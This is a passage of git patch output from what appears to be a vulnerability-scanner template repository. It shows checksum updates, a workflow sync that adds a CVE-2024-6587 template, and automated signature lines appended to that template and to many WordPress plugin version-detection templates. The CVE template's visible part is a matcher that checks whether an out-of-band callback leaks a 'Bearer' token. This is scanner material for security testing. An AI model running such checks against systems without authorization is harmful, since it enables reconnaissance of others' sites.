http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c8d63ede9450bb34a3a7224f9cc22adb388f7f64 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:2433b269b279a10dc5ae32fc530214f9a3e8d59a -http/technologies/wordpress/plugins/woocommerce-payments.yaml:43a97eb6a01fc06e5e3a2591a27336c26707895e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:637424698bdf37a15ddd09d9322d3454a2f445f6 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:160ee9d396f2fe013d4e70017607f79992848fd9 -http/technologies/wordpress/plugins/woocommerce-services.yaml:fa513a84de283bd83952ae3dadc725e0393f0e6e -http/technologies/wordpress/plugins/woocommerce.yaml:51c6c342d36c9e083ec8ae835b7431326ff63622 -http/technologies/wordpress/plugins/wordfence.yaml:e078c0fad01bf26ae22f37e50d948c67b10fcbae -http/technologies/wordpress/plugins/wordpress-importer.yaml:bb2f7d52b53743abb83d8a8eb985b0ec78d8256d -http/technologies/wordpress/plugins/wordpress-seo.yaml:89a13a38729a78ecdceac97d0bc732e035259f42 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:d723d64c84373e779ad752ec7dcc75f354433064 -http/technologies/wordpress/plugins/wp-crontrol.yaml:b3cf3ca9a4bfb9161093bc05b9a1a56edece07bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:c468a02f1cc0689dfee0ce5d977f29213d960bdd -http/technologies/wordpress/plugins/wp-file-manager.yaml:3ca2e73655bc81995a13b0b2defbeb3d0738e8c2 -http/technologies/wordpress/plugins/wp-google-maps.yaml:7714dc488408c727f57109ed7aad1bf87f11915f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:355789faeb9af8ae680b4981442457c4f1b9126b -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:8d8ee2d6d5a9fc4dc94471bae3ad3e9f723a73ee -http/technologies/wordpress/plugins/wp-migrate-db.yaml:99fcb86489837c7821d1d0387cbd7c6c7d85b13a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:d3e894216ab73ac2eb100bf15631e8d2b70114b0 -http/technologies/wordpress/plugins/wp-optimize.yaml:872f6f68b74611212a9233259d285aea5775cf72 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:7f55c4d27aac005307004c936a5fee14b6859c41 -http/technologies/wordpress/plugins/wp-reset.yaml:51054e4f9fc542114ab05096b4bd2c9210e52880 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:353b6ba20b6f0436224d08b1b849ca681f7e7046 -http/technologies/wordpress/plugins/wp-rollback.yaml:cb25e42fb3577858d0195af20725754f466eb1a1 -http/technologies/wordpress/plugins/wp-seopress.yaml:319b62630837ca13b855415d8ec1cba9c9afb434 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:083ff1f69bd969cbc7d79a8d909121c881d99604 -http/technologies/wordpress/plugins/wp-smushit.yaml:744abd567944f93a886f056ac83e83d68a4dd5a8 -http/technologies/wordpress/plugins/wp-statistics.yaml:819bcc204040d5a967e0e2138f61df44f0e1bd2d -http/technologies/wordpress/plugins/wp-super-cache.yaml:309089e4aadfa5755e337efaef4dc1b94e9df9ac +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:220c2c76b73a06e9668bed8c769a44e59825e346 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:561b7854df0779ca6c9f3f6f2913cc7c20d7e027 -http/technologies/wordpress/plugins/wpforms-lite.yaml:86db133b638076dd7aa80d365567d9dafe80101e -http/technologies/wordpress/plugins/wps-hide-login.yaml:5416ce97082781425a7be08f289ed2ee107e5d6e -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:a3612f56dd297880b0d8d9faf7c4a87ad488bf55 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:828bb1edde347f358b05a3528c734d7dce2b7e5c +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8918,7 +8919,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b014b3be801611aa889fc1bb44fe425b6a2ca604 +templates-checksum.txt:4dde7acf0da171c9493bf4f4e8555a0f1f21805b vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 9a0bdf5b34cc4225c592e3dd2bfd330d37d7883c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 25 Jul 2024 08:48:30 +0000 Subject: [PATCH 1613/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f97872dfa1..7696877b98 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -27,6 +27,7 @@ on: - 'http/cves/2024/CVE-2024-4885.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/cves/2024/CVE-2024-6289.yaml' + - 'http/cves/2024/CVE-2024-6587.yaml' - 'http/cves/2024/CVE-2024-6646.yaml' - 'http/default-logins/deluge/deluge-default-login.yaml' - 'http/default-logins/gitblit/gitblit-default-login.yaml' From ae399b6e160b99aaef63c2b5aefab4859caa096f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Jul 2024 08:49:25 +0000 Subject: [PATCH 1614/1841] Auto Template Signing [Thu Jul 25 08:49:25 UTC 2024] :robot: --- http/cves/2024/CVE-2024-6587.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2024/CVE-2024-6587.yaml b/http/cves/2024/CVE-2024-6587.yaml index 35e2b4a898..a5575a9b36 100644 --- a/http/cves/2024/CVE-2024-6587.yaml +++ b/http/cves/2024/CVE-2024-6587.yaml @@ -44,3 +44,4 @@ http: part: interactsh_request words: - "Bearer" +# digest: 4b0a00483046022100f6bf820318dd48f58e840d2cfe9d3cd7c403f9ba617d5c013b85cd796c166641022100bfa3aeeeca2e6a75a501474a149c5fc0876bf4808b458cc8896c95b6a72142c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..0314ba5311 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034fcf867c9abfc689d16b9c555f6454aee32665f037279b5509374ebcded97d40220505c547bd95fcb0739b060f48baa050d2d762b2b9c2d8b738e6e10edd8f3fd5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..90da5258ab 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0709ea6d503ed482fefb318bea10835f2193c017194c0d52c4c5aa6a3fb04660220584e826d197c7067bf67cb20221ff351f2ee62d21252e797b3453324bf69f0b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..73b0d612cf 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022024917a9f94f2b5338542fc790d99ed4cedd16227a757e404ccb0d73e279179510221008d9a5fe2d93288404881824393b6e6d56ae58bc3f86fd2cbdc7ed05a0fcdd729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..63b0b2a11e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009b890ac046a55a278aa61af482b8eb4f45df5fd194fd9518c9f5b1d7e12cde60022100817c92bb3b80451aa480a0a96dde6e93c86591ea99f5f82fdb1ae01d3521f9cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..34672c123d 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022046966a6d52da4acf98c99ee516920f130387fe48b0a265d2e2b53a11017880080220063c4a912d71538eced91f2db2f2ef17df5018ff75c444cdebcde2a9a8a681f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..8deb6f135d 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b2c5ed9a4c23fc247cfff51a0d996db335488d53257582a1f548dfefa4f322d1022100a1be65203deb646239f3b6bb1e9abdd0307a2f280a350b047da0e47bc83188c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..e7a9a2567e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c48afe53efb5779ddcf713551e8c1d0ccb2dc356ab1bc3c09f278aec163c06cd0220444dd4796bf505401b45e753a013612b1e4b6c1ee2bc7ba1806b15d9c1ef448f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..ea466e27ff 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e9b90ebee6cf1e7c74e6cf3c0474db5a16e66140ec05733ee5fcd230d3c996c402204351f7b671bd96cd2556924cc5fe1f861d824dacbabaf9a53f160cf102b1e4ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..76c27889d6 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022065b2e9547ff46f8e67c49f9399f851576bbe146d8441cfed5356c2c56f974a24022100dddab096ca779ca90d9fc4b53d0acfb4ee0c1399a49defded4a93d6abb45031e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..cdb646ccab 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 